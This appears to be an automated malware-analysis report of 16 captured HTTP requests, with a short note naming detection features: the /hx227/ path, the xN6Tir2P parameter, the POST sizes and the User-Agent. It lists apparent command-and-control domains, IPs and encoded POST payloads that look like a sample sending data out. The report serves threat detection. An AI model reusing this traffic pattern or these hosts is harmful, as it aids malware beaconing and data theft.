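16 HTTP Request(s) detected

Note: the requests shown below all go to port 80 under the path /hx227/ and use the parameter name xN6Tir2P (with 9r=2dOPG09pd on the GETs). The POSTs carry Content-Length 2202 or 57282 and the same MSIE 8.0 User-Agent regardless of host. These shared features are more durable detection criteria than the individual hostnames or IP addresses.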

http://www.blrsi.com/hx227/?xN6Tir2P=kq3bp7KFfwPJjjUcpMjE6VKooA66/cNDjBaQ6qcWC50+lt9iyP9DQ8sETMJKV4pFHVACpRdr&9r=2dOPG09pd
  • Hostname: www.blrsi.com
  • IP Address: 199.59.242.150
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=kq3bp7KFfwPJjjUcpMjE6VKooA66/cNDjBaQ6qcWC50+lt9iyP9DQ8sETMJKV4pFHVACpRdr&9r=2dOPG09pd HTTP/1.1
Host: www.blrsi.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.khamattqy.com/hx227/?xN6Tir2P=Rl+S/kQ13KpkGAa/VP2WOr8jxZkMJnvIkG8+NwH7jWTSEttFFF+rofwSsSy1KD7beiZBP9Me&9r=2dOPG09pd
  • Hostname: www.khamattqy.com
  • IP Address: 162.213.250.143
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=Rl+S/kQ13KpkGAa/VP2WOr8jxZkMJnvIkG8+NwH7jWTSEttFFF+rofwSsSy1KD7beiZBP9Me&9r=2dOPG09pd HTTP/1.1
Host: www.khamattqy.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.khamattqy.com/hx227/
  • Hostname: www.khamattqy.com
  • IP Address: 162.213.250.143
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.khamattqy.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.khamattqy.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.khamattqy.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=ZHyohDpQ27lXf3a_fquNVc5FhM8OcTvj8S0rQgXfiyDxN98BQU6776tAiU6JSAbdFxx_XIhrwl~Qd1USDblDjzga~9zb2rnMVC9HEAMklsRVZWxti7o5YgoYuljmDbjDrh59V5CU4_aBGSSpTOh_7tqw(x2BfCJqz0Hz89VKWBIwZPi6RDh3ralo(r83FTH5Jz6dcWH8mqrypztvI7(femsQl9F8CWmoK3Gr70b3HTI3bwVEkUrNbgEbBDSEv90_0sZWu_rQTA(JJqFKu-G1kh9MD1vqm6CtQzS-PD9FzBOHmyXYgGmqxvD3dwJyvLHw4Kq-3mkd9aC4nBiH2owG27BmJJFDvQyuXYMktM3fHS3DO9kC8Alroocyzn526UKe3sJWLJ4JH6EPReKDAEqwgYnVGxjS63K2pwmTDzAWUYQMIHZKwd3U1yu86igjcP07irSkufTa82DGb9gWYW8wp5VL8yheBzk0dQ6qROrItb6cf5op~cUqeH~gKeko6DCqRn(u(jlYB1T0QA9-WvlC3czDrTupBnVgWQQioZmQPgSiE_QmAM8TpFLryWd1e1lCynD0si1iuln9Rtnts30lE1FdJEGUt969Jx~81z~tHiT4yhqlLcxXCaSwOngxY5QMaVSbzpBlqa0vhz~ds0VRQQ0_kRVf5GTEbq4XDwQbIKesV7IagvxLr8wRBqM3p_LOeXYNn8j5GNa9uiMSfhpfevw7CD41bOqwg5FRGfc6Vy(RH9mDrv4Xt3j6HX0rNkT2HIMYzzl8KbAx6wMRuLdPTxESahXOao4SHJQT5sQ1ruIy42FA(VFWAjg8QTkac0t_vAjcTJ3w1uxIFZcYGT(ZjCynKFzdOH(7E652xIghIzL2957nV2OJOCUs2glXsovIPVMrGNpZ4DQdOdksKj29PQOc(8gtyaD9~6OUX13zjBZ5MkVRWrKWqRH4Q_XB26dVg0PcSlO_jKJrJPDERJ6_zOvE1vaMP-rlmtRZ(G31nLIS~Sp8CHbzA6XUIe8fh1Vi(JgNM6sARw144dm_qfFL7MQ59NAqQPu42NpSNFEuotR4mI0CX_R2y2Q0eh1BSYijhjP8dktwskG1MZJOJ-GiO4YgnWwLLTZ8Fey3lI9ZU9iqbB~GFkruPhaPVIobpj2hF9NSAk3QKa9foX2NMjgWCMIk3dNdNy1c5Q5bhAn9K3qbR_qoOnrioMjr7QBZ8LqujZR5cqyvwVKY6g5mAfSeIcpDl3XxC2fBFkqxwFCGaEEj8YxRUVX6tTMwOJrxiEtqMps8OkptyDRypE4gXCVnX11xHCCbXNDxoXEsP_nVTcHu(dUJG5kW9iYGd1IJKEn9MHgZULn8d_tg6dzx1d~hrOvvFGPlsl3kH_Ra0wWyB1oiY_iHpoAlWpQAfWlk(ODXL6SxWMvprcBMcTol26N74y(LoUTp(9ybZE~Sb0qpMP4xpK(-xihHMCiIfjl951(dHZwE2tieZaThxPPKWR2pf910SEISjcBdQhe06u4DSo1XE_ZIkLpAo6VlNecq0bCy0171J_e19_b6BH6mI3cmTymLk51-rM59Z9(HtQzfuHS-P15RfVlI4xk8EO9e7HVruoszmvPNATvhgAPvfBvcyFqurFgFvzFF1oQt(mh3l3HX5vcFdMqLml4ysqzmdcNCYsvPkDlFP6a-y-gd38S6p5HwoHxY6X0RRDLpWHkPh-NbD4BjZxKb8jaVZRt1Y9J8G_laDcpDrCzdnmLEqj~EqK04ToLfye7qTyKk~E6js-2v8f9I(PNg(DF5WivFV3kCTiMHWagKc8RUeMhAq95MBx1CD-dwKJg8GZt9UnlL~giMdIpfLrNWBCZMeG5l(M6Lu7QVYeh9AQIYoxeuviMSrvx_yqIb~VEYFzLoulY9i7HjcB3pYLYnZIn63qdg9yWmF7c-9i6DwIoV8d0FEui9MUFdGCZvfk0qtEEBO_NJF07mw4A4eP8KBZ9VKw489BErgxig3xT
eS85ijdmJzco46ZZjpNu05gbJe40FGtMv3KZ8TKIhbyaZ(3iQayHetJafZBfcmjTpU1WmFda8x-zATYBOoZXCHz6SGU7cpY6KMxoV9i65DKSCB4sMDw(CVWR2B2kvPJBzqpt4755PM1NsYkT2YJVgSuaN~jZ0Z5LPjiqqZY2XJDtrxsZfZCZZGdgCe3cjzysNtn15\x00\x00\x00\x00\x00\x00\x00\x00

http://www.khamattqy.com/hx227/
  • Hostname: www.khamattqy.com
  • IP Address: 162.213.250.143
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.khamattqy.com
Connection: close
Content-Length: 57282
Cache-Control: no-cache
Origin: http://www.khamattqy.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.khamattqy.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=ZHyohCxulrgbb1jNI4XIacI1zag-DUrcmA9IQhnD2GPjJcMBAim48atPmk6KWAXlIGNnXKNNwmeXIhILUJMDrDcqht3Ch5vPbBBbSUQkr8NXXlY_upAlFUAehA~pKIHmqCV5S7K8qKe8JTSFQtNzx9~_riKPaRsZw1G2wZ8WKSoEIMqERClezK0e1ItLZU3HCUadeFXSzZjwiTN3PoHiPGd0i45_OlvuNyyBkFPMLyA7OS98pUvEFB17LgzDvpEq3utOrdvrABX_CYNc~pe9kRspPWPqoLindRLzST9-xB21tSXKgGiUy4jBQgJ0ipjv9uGm9DgNvbS4mnuQwqYZqLA4A5VU53bgXZ9ns8vfGXnDdt0B~AlriIcwzn5A6UKz3vpSKJAJB64JTsyJVn2QsYmBF0CP~2mepxuxETcWSp0NDGJOh5DTtnmswCozcOIww6CWq_uU72DBD9sFcSQS9coRxRxPNjgSZBevRpP-scyATZ9cu-ZlLyC5OaVu0SuZTDX-5C4lHznAQ2QrbtJW2c(SzAa_GmlPHRIDoJSMHCr1K-s1D68E5Uj67Ex7cU1H70z_hy9nplqjVez49VJyAncgAEqbv8yTawGcyULLDF7Z~zKDDsdCG4bJFllINLMFSViV~toVt5MKtC2VvUBxPDdOkCxt6ECWVvB_GT0uCJyRZOo4rvM1hO5-MZkF(fj6BEYyhff0WPqcpQwiDhN0V_ZCCToDbZnmg5NVGsw6SzrRNeOArPFR23j8DX1qCEfUHOJHyyR8OYog5xMf4M1GOhFfJQbReoYvHL8H6ssDgIUzpHlM6VFdBDcHZ0shBldZvwuBZYbghcZYSK0BNSrUnCTvKlvxFWzMMexw0_EXDSS3y96SGnm7KDF0(CEV7MXBJgIvTNMtg1csFOsaLBGbDwzy0aJ18obRt73-RUii6h4kCAF8ZbWOuEnFRKrd3bhZiCPDH3ylvaNCP6boVOzRwfmQ1PuqQsLW8OYY81XYhIpC4w5QJn2lfPa7J7NqnUds2uohX8sjTjJN(a6Dy48W~-AN(dFUZeKUz6F5K1sb7f8Ik7ZATsIjwVhhXT5oaZr4iUy2EGMovFuQBNJ-TKPNI7IVpisAPSYzFa3OlsVZHcaqdWCGMHiaBwmdW5ZM2iTjA79UGHPPZs5CsVyEGmUcQOtz9PBUHVsa0Ax9pTWPKx2bRe2XFk(f6-GtzTQGtLLunq5tJK2Orxa04ipVZYuhDvIEpjHSDmPEeGu7~jX8ZWAz~4ZEXW(NyT4uCYTdxVcwPORxB1ds5wZc8HUmGDRvZ3lHRRe0L5v5tmcyA92jCLb4gPhbWdBV0gcvcloWEmKBI0k-ep76aKNG~-vl~4zOvoudMUb_kQn0NOFH3RvuBgwqQsephbwkWIpaUmFw~8nCMOKiA-vUg8tYRDsii6khgWnTm3Xxz52KTky6em~ZOYEbi_vz31FlJCiVWz8mywrdHYYAs9GxftDrwa7_VTnJZ9t3ZmRPzNdxbBa9p9crUKl5esgln7hI4Id1cOgIm-61lEu7Fs~gyovnK3WmKH9yW2qZjvNildJff_(bqRfpuE21MUBeSlgAmBpgIrxw(n5errMs4OH5Uxe2k1LvHE3Y7mPvoEMcuyFB(tA-pH1ZlDfLoM5aVMK16k8r9aarKJBbVMrdijprVoGi3sIYoMORh9bOq3x443hxRzXBWF0uivBcD5JgMz6U8VuLNkJIZ7d0RIpmB8JHjSXCsED9ojPSu7xVFeKSy_rte16EpzbdtLqivccZzbs-(wxCYznYdl04LBp9SbB4e7hmEcdUr49lTxpPT7JxMswwHYVZbg594lOFLqJhOuFTJyFGTEID1fu-nv4OOuwUCi8YizHmoCAM9-I0xqUkzEE4Phud73wvifTcMi3oYK8DVYnY7vxKkBvaNZ4w1CehktAo(f8HbOq9HWxrMSBCJXYB13UNavUiXHHj29E6QZ5TQZZ6KD4R2kkUpSOh5XD
MdPtnvdaXydU_gJhbosic5hyVQcJlUNAq4eVrRd4dZmaw5QzrNTPywNDqUlHHnynZXxOHBdKG0eXfA6BfvI7wDzbLH2PSzOu4H0hzxSPpAPmCUvIZKAa4Ygl-FGoUJ41Iw4h968omUW5bV1nxbINdaMO3xx82W7D61SKtLvCRaCc1t_wfWmdSLN0teVJ8oUxCtSg1Mmb6ibVY~IUNxpNtL0vKj9GWTS5R1CuI3fyX8FN4RPjQLfA6ic0iY0~birppivMQbnjysWnTwCS_H6Lxj8itasSi4JY3bEM2ma9VoK3b3umsArd8Sfu8LOnv7S4a4I9XhV2W7pAmR_RydAYhFaYEsQMgm0Wa~0IqonNzmst46CH0jXf-iIdi5Ye6xgWoKx(35BjxVXBfLspeagub525btc0

http://www.kredit-hilfe-gesucht.com/hx227/?xN6Tir2P=4G7jrqAbeWjXQec1rW8nMAUbtw6Cz/YSi7ZNVv8LBkm9bGwZUddzwvf5NIY7RUoqeZDdA1+8&9r=2dOPG09pd
  • Hostname: www.kredit-hilfe-gesucht.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=4G7jrqAbeWjXQec1rW8nMAUbtw6Cz/YSi7ZNVv8LBkm9bGwZUddzwvf5NIY7RUoqeZDdA1+8&9r=2dOPG09pd HTTP/1.1
Host: www.kredit-hilfe-gesucht.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.kredit-hilfe-gesucht.com/hx227/
  • Hostname: www.kredit-hilfe-gesucht.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.kredit-hilfe-gesucht.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.kredit-hilfe-gesucht.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.kredit-hilfe-gesucht.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=wk3Z1OtVNEKnFocFph9zZFw-61KOzPkM6Mc_XrkSIAuiUVcCTb5Ot4buBesvHWUiBYnoIy3nkO22ItSlorqWINBGn8AWOmsF0XSKvwIIaweDDcGcR1drrz7VuNY9DDx7OGMLlrJlZhqt7H59jY(j376jXy3mmyP0PGEeOogqBZZgUIYUqQERz0L8WJyeYiQxNJWjBzBuNcBjPRyvzrSZCqEwpM79dDvOzU68U5BTP4t6ZjIzHZxtle~OuROynoewlZHZcO6PTZUVj6LO7YbwN_3L2f~HCnz0QrKlrWJcw6HDetY6HpUxdxCRoK9Axf1Dt75h157LrDpBF9Rezy2K0P0hELiOW5VtFGOuYix51SSD9cLMRWfsb5JZh4IWzJGvE18xjTTVEWC4VZ7mjx5RxIbcCvWsUGbPRG6QOXxyIysIUsb91wZOIoQ8Hg2nDpah(Bp1OWjfBR47Ggh8eMM4gN4f8IAIAVI9ND7SIL1uioSPCzubK3QslkxcldVFB42vW71gQ56W5EfLYSP0x-F7cUDZbyhnqR3jPJTTdKpqQ6gHSY77KLImvlCji165DG5bO-B4Ifq9onVKXoJ7bXy8tltUtcLwqHEaitSLJe4jFZvICZxdGvrQt3xdVyVsMMIhT6MPWmR7ZkxwbIjDgm~JaNBG4NbIvHjCJI2sScMFWbGszaDvWOGa2h6dwkRTa9pJQ9fUnG6xdBhHMcRZ(JT5faSIsOPSL6Uk3ORndkLiQiBkIuW0G4e2BCS67CMsWFa-dnDkOQ4A0RlCUJtbz_p3Gbbi6P8ikiAoeLZBMxfr5ImA~yWt1zoTmBttjDB5gVrwMP39JvtuHPKI9m7iFhWu8BsQG_zYdiwoyumA1qaiiE(ftPGn557Zgq6rA8hqg3l7FwESAm5NpNwlBSRylOLE0gLQj94uvzxputLq2_WOp0aY2xPnGg5mMpmasgaedDBJZqLZQUdwAIzKVtWyh32BJSXfIuWvBk5E~je4m9L3O1SgcvJlQeJtNDsjbPha6tI2D0mfy9jt61MBv0RltDFih05IH4senf2xEtK3k4fWTZdcUVKpMr76wGkYiqIKmHoSkH(438ivX4GHvwz7EAaKBljQXWmrE4tm~AP-zvFzGEQnTFpJsLqDHdq8RptV~y3m~C0pVRPtuUDWJ1oslp1HEerVXd7grTmb~_coppqo0qleoPyjZQXX7m1jkOxY0tKXEB5HhVmZMBxbQUm5LDD-LRiJuU~6Fhbq8c4VPh8IT1IVHUBxU0T16fnZcnF1nROwUJpb3ev4LzuVyd0oCOrUZIJ9XpcR5WMxqMPLihVxwFqV~DiyBXqJYsNhEMLc~Ym_NJXhDhQsbq3B6Q3QXepjZ-vh5kmoQb7MrYw5HcY2eJnj1vgOGdgOQOzwXzrsji~unGiLKrIF4VGPopHOWw(ZwIep~pLbDBDoX1LwcrCHRrYYqxPZ(iYNwcop0Ra8vtmmiWGCA5y1lQL25ouJfRVfMyashhKXswlFaa1NANt9NlcCBNxRSTF03CMp44JGlVQBy4E_E8eEl-3aDEC8dkgTcNcOXfz-I_IIxKukprAE9DDkeLNs~qZEUHhgFxau2fxFG4UavwSvPmqX23sXsEolSa8zhevQgfasHLNPyAyawd(iqW5W6ajaRo1G70fF3aJb1g(P3KcA0e72BF72y9iW3K0noorZk003mBfSOP~q3poJq7v8vGDYf3SapZanLOtor9QHICLdiqFB~-sUwZZqjIT2TqmRQ-SMG0JbwlX5OubaqgENt3nOjqo9QlD_EqYFoDKFOUNLZcup9jz8lBZ4xUtnp9TTjynMYVo5lqNNHR(l62L_2DdJohu2cAPOC43t0s8dI4WVMFQgPr4i8KM4AjEF3SDGQU8ivxar6v~wjO(8oj5ibX88l7xtfCBfssQW7GyMOPg0fRBI7Nt_gGvb9LxFJqJmps8URfRmjYeBQGGdEmq4CWwWThByCdzTtevUhLeH6z1
awKuy9onOREFwSGeYJn1wu9abLdL_(UvVIa4wxE8IdV7560psLmp6eHpxDOqX~V7E8P820QIN9TRSUiuI5tGFCWhJ75YJOyhRqLjYbXvEM_6eqfmvDt5fYWzRrjs2L8yvHfqmxeJSGk6cQloBPOo2UmVhcx~Ecaz7livoI5DvBoo3jk4ygEMq1DWwPih_GkwEg8Aq\x00\x00\x00\x00\x00\x00\x00\x00

http://www.kredit-hilfe-gesucht.com/hx227/
  • Hostname: www.kredit-hilfe-gesucht.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.kredit-hilfe-gesucht.com
Connection: close
Content-Length: 57282
Cache-Control: no-cache
Origin: http://www.kredit-hilfe-gesucht.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.kredit-hilfe-gesucht.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=wk3Z1K5rekfhPOIUjAtjUG4pvVGUwdEzkrhUXusWElz7fWECRZhJh4acJ-ssDWYzeYOlIwbekOu3GsikvO~BKdc3l88PEDgG01vRq14IDA67HO(ATn53nzntlpF9NTRKMkgPtLpJdgi31G4qi-j_or~kOFnsmVXKODxBQ8NxCZtUCvsiqRAk9Q3sD43mEgJGP66jDDZEC_JhRm~3w47pSO5WqML-RzPJ~yP3Ko0lN9R2XQQbXplyovOjnyunn4jgmffRSMvsfOUnoLqx3Zf4NvHh~8eHVk7ITuW9lWIK8afPVNY0HpYpP2Lqkq9C1aEdn_sk7YLiqyZBDrsCmkiVo_0uJ7TUHeVqFGe6ZSJ5nA2D3cbPXWfsBJJhh4IOzJHLE3c1iTbVCWu2UvP7imFf9IbQDuWIF23nRFaIJ3VyYyIXWJH5lChJQcZ3NGviDpft~EYeZzaHAR48Iw9vaPUat8JTzrR8CldaNj(JPpliwbnMcQTmOFcoiVh7hdoCc9(ZXbwYEomu(GfBYD~l9_BnAk(PTR19vRGBds3ycZ02fYYtcY3gN5tlrEKymHWnFnpaIPJ_APy4rnZVBJEfb1Pd7z4vq8WOoH88roene5NWPaqBYbRVMeGtmxFRcxhfKtskKL8JckZQI2JrT7SwvjutFa92~dH6oGbrF8vCV_ZvS4KR5v73NO77zBaBnX4wZcxXY-em(VqGeSt-F-tlmrPSdt(ah6jkLtxy3OZjdUfiTjVkFPW7I4iLbCS8(CNublXpdlzgAwsA9D96VKVrlIBQYrb94LstghY_eJ0YLxLB0rWP7wfk0zoNkgR8lDFKkV2dP_ztH9o1W5nW41DtAE2T4CVFUP(GTz8P9PLF792yqlHTvvrSq4zr99~AJY0oxVI7HiMOE11e7u4uU0Mnis764AHzsasxhCRd5tDA1eCsgneK(QjzEwNAGY~dsRyCdi9NeZvGb1JcIbfrUs7Llwe8LDuJIOSFNFR310KmnLDWCEH2bNYgMvlGQQcZZqRrq4k8KjOJ0Ore0GxptnwQiU1GomZWCooVmeyRaPbphPjzAu8kXg6BDe7e2lUul_RooC84sXf5sez1RZe-tFbtOCHGVSXhE2OwVvZo~ELMyN5zG0YnBnxJhqW-DoDjRbJD8hrr1k8rT3bEoAzLCVUxrpdJAIiZAcvl9gKCu_VLuemh0pVeos3Zdw7-6n54jvJU7dqEAzdt6VzJYjZdWXGaOBeMf33ergmBFwrnhKwbOnBwTkkFEw5eV2rCi_TxU0VZlSzsIfl3ktzlAECB(K0mG4DqSJBhcucE2Ug5v8WC9zF41mKhkhWVR2aldLkzD4HT3OebJ-mIazMidffF1QD9PMpLV43YnkaIaouulq8eH9QjT9mv44gZKvA5RvLxRiLCkRq3wEOYduUkgh~T3tbJWQmR~YCh7rf9LD75ZVHIXfCVT7gyuiLq5xpHxcoChRSggv2miWuGHZXvkjfg55u0aTlyFTypkgqztxJ2T7RSXvpNeSgoIKkEfCR8nAkf87d4v38C35gkFK6ZnM(-bEu8bHpHGfk2V5KhXsAm5pug8bgM9GrvfrlzzaNDK3tHWg6AkuVwQIcFqBKTEUKpq0EXmWMhd5Inr4nghcyoe5pckzf9wtj2909S97Dsd5wNqFmCy4Aw(A6ewaZjvJziXmT589uH5LkJq4r50kBX0BaXON~X16gOq6Xzn3rbeB~U8oKeKIhgvacvECrjq5Vgwck959dJm9(GWoiZXevpBX9g2i3KObGVu2dBilffgZ8WRULuDcEBnSK4ZGE7ffyL~xnHmHdj40hgqonOswK_bUQNrplVIzHG(FqIxHRI(Bi0WFjjKsDY9_gFEfySL0cgdYwp6qRnRSgTokm2dAhVoD~Rr4aLhsXT4QpjbTZNprxLLBwu4-Idj1WSDuFTUiV98LR9i3Xb3O5ZePUGsrc_LIt6k52IRk6NI0q2LF1LWy9dCMr-7P~wjIyK(1t
Eso6zkZDcQBthYH6wFjklu8yuSYLCp0zQU7AjqTMCfAbQoFtMbg9GBm0EccnD~B7o9Oo5rg4vojlRHEqR6-enGWBL7bcTHXVnz9TzVnzZSOie8t7lGO9gVkjZhx5GMI66JbylhoJ6MEn2f10eTfxNSlBHXgyfd_25gA3vIarpZ74_60trrzoTx3eLOQAhahxQi7xpD34hGWGBtozm7-g1aIYB9OCO(dLNNmz_ko(xlOEI7UlAIwTcAEEaCuMhfWO-Hg0cgDjNdgFaoy1iK5eSvkAv8C1uamJN9_IJ4MGios6GNXElp5jCOcmVqIctkrV5w0eSzdoFGoSoMtfXGFI-tlu1XqUfibroDC1jULKZpDMXfztesNlKV-1BAQ

http://www.cqpsds.info/hx227/?xN6Tir2P=+VcaFGfUpj9nu5i0yjt8eVOmpCdC+dSCnM2kQt5S82iAxxQZEZNsYCBs37hgHVtvggrtdcTv&9r=2dOPG09pd
  • Hostname: www.cqpsds.info
  • IP Address: 107.183.130.155
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=+VcaFGfUpj9nu5i0yjt8eVOmpCdC+dSCnM2kQt5S82iAxxQZEZNsYCBs37hgHVtvggrtdcTv&9r=2dOPG09pd HTTP/1.1
Host: www.cqpsds.info
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.cqpsds.info/hx227/
  • Hostname: www.cqpsds.info
  • IP Address: 107.183.130.155
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.cqpsds.info
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.cqpsds.info
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cqpsds.info/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=23Qgbi6LxB508OGduzsmFwC8hXoSx8TI7avIf4dz~iqcxh8SR-xmJFZu0-cOV3B7wizyVZyw1l6XFRD60vRXfHC7V2lRuRSI~ohjLUNokwu5NENVGxUr8LkVUvJdB4sJPvIYrSqtVbXC0XthPWROgx(_gPzhaFmsQDL12RAMUMmfteFtXzHfFho7(4yTqHn9CjcnExpO8xYSbFJpmbTDLnYZ3ev6ALnZJv6L3MRPAhLzRAWrgIrqzxvm7qxn~gLCB17zGJTzhPTZTNZKP1yB01Ff4RT_y2c6~jg4H56479JfOYBqatBsEBLWAAPRVSztXHlWoTqrNXj6Egz9pLnAbueUOGRybdTXtfzh68Y_tW13ARZMzODXgrdg6-99ysSYTQASD4jhauH3B1uEZMdp9O9FYBajVBmfpR3SAn4Tu9IRrK2OKHska6Q8B57wV8irUZsHMQkYZCDt5lVov3aYCm8GD-LDkZ3P83n8kezHIZnegCzZn_jMmOCrbquLF8iF~fqxfy3aMo7EIkM6bf~gdx9wZTsYGh(whxZtx53INE3R0KRge1wld9d9lWMKZT2lklgxzTcpV8sZwgz29eDLunMUzkqEdvooFGT33us_Zq3shrIgP9PLq2DoSh4m(-25uxUQVh6ywWEFR2UwlGkXPwTOkTcgNY(jqW7OCGo1PYSFqpmrK9JvxkHXNyoUGi2XDYcM~oygfKZKo0733deeo_7vMbjOdKP5JfW6L51RrUceeNofWGiCriyVsqdEgOfCb9PO(fsAwfD7oOuuHdjyVJ~_614WfS0vt1l614kYpo6gcPpMfMvPArYzoAEC1NF6Te2Z8c6OcTEiHUw-M-PmJw98JOZRVMoJjSnJvfmPLe5QBjESoZmasEGyOE7-VOlMm3ervn3-YE9oPU78fkKHPsmeCVyr5L9pgUiY3TVKD7Wokir18aVoGYecfzhtl88jcq6UbP4Vqd~JSrlOt5TWAJ37HnV_3jV2wLVkHGK3atv7G4RP1BuGJkRroS~kF-k9uB~zFDNa(P5bWmv3DFsuVCcqCyfVlWLNFsH9lD2jP5Eg~hRpabs841C4J7j4As9R3X04iyK8x-iaOwZqwWI6hp9rpFR79Ya_LogfxhfP5MHv8cpbIgdSYdDUAGCOWB(2ljXC32XjV1NgcVphgO8p(uqjEfTImo(zvY7jW_YzGlVdM3i2zwumxGBriRur8V6pbH(btL7m9j9dv5ySjeTVfv~pyVtBy-dJaKPsrHOQLQX_HRAI~ThfWdh4Z3kWi9IqlqkR7L9unKHA4kqbtESfRB86bdNmlFQgY33SXNFGk5WI335F3uYT8ZdgnZjgmCDq76TkyeHWp0AXbn4lLbdvIza2a6SWQH3-1Bu3(Nt0eAgXeDvNEsKoRSpOeDUT2OnecAwQ(X5GKLi1mUhEbzYg4vsYOHnGjc13fAcbrXYl4G8DdBovjn32o_2AYSo7lx7vtI6VI6En9pVDM4sp4Ke39twUM1MgAnk36FrVk3jvLEfEKCWseC3XesY4ttW6Di7Kd3S2rmzyhvt_FqiWuab5LyNeoOJ3a5ilQBvjoqDVgcqS5Cq92dctVKKxRVw5vWrV71OU83Ap5_iGsilZrACyFfLO0aadxO~E030sLVvryCE9ce5Gwvt6mBTF7VsAwmHWpbZtdcIq2Z6MCLaucdaqZWv3nDEcP93QCuCR2r0H5ye616w3pbgy3vayt-HypVOFOKu5aA9nHMRWGjCasjmNXyBCJP5HU5RkICYczAG1yLiQsTZUHxlbHQkq5yR1Zs8EpljQSR539Mji8n(eLqWfso0BFEOJSOGKKy8EjA6b3da-~_wpaBJoqZYFB2SXrL29J5UjJW~08RmYO04pTd5rRdzr5_ZofnGOD5vgE3hAm9gZOUnKqLUG574k7tno9wcMCxjm8XMVwWaa5KTr3V1Kmo4ju93Y~5hb99wUx77ad9vPaAy4~Jn72tYpOZRBC973HsjRMvY
Lkti_RF~XORjhYl7QuPN5pfsOhvzSBdNt~4BxXKuhmqi6hyoaLt3apjrW9mcyDSqsJwaU978qtokxvsLD8mw-YE(4E8jbJJDnup5WlmFz2lzp4xZO4kwCQloyAI0XoKtR4pnZHdxtU-uHIDOSJE5z8dxldTYEcweDQRdROC(ERo8b7TMz5-pE80Rdayia4i6jbQgE\x00z7livoI

http://www.cqpsds.info/hx227/
  • Hostname: www.cqpsds.info
  • IP Address: 107.183.130.155
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.cqpsds.info
Connection: close
Content-Length: 57282
Cache-Control: no-cache
Origin: http://www.cqpsds.info
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cqpsds.info/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=23QgbiO18R9p4N~i(mJrLxzEpHlf4Ma6ypXqf4N32H3DmCUSAtVhEFZvy-cPR3NP5Qz6Vbfl1liUOT7_jdIfF3fIaQIX5HWX(Ld3ORxogAa_TGkREgY_zLobfOxQYfRnddEc8nmRRZHz7WtFdExKuhr4osPnai~gRHnt5xJIVJWrmullXxrmJAYGtZrtkV(DAQwnCAhe3SRUUms02cv6bXo0(-(5O6HeItSbvNVkClf3EnzSkofxsxeEjb4n~xnXA3fBFovAjf3vY4VYISjM0F11ggL_8G88yB4wDZ7W98hTAIAVatN0Cm7gDAPbIBX-dH94hz6BNiP6Wyqh44PbGefUBGhlftvmtfCi1sQ_sTd3TBJP(uDX7bdm6-9lysT-TSQeC4rhP_LxAD6SJ6Vnj-9BUga9DCizpSHBAEsTvtsS~YOCLWs7Oq1nKZzaV8uYVY81GVkzYCDisFIyryu6LXNAPZv4mpSo9Xzzk8iILYrw5SOmxZbIm6OMfqLYPozzs8WhaT6tEOf4JXUGY7mORRBPTxowNxPfmD5AjarcGm(76Kc6JXFnLsUjoFgIbyGkmTx4mT1jW8QK7xOM97Lxq1UglVGlfuhPS2bXgOFteJzB5u8GMtj46ELaLTNR0-y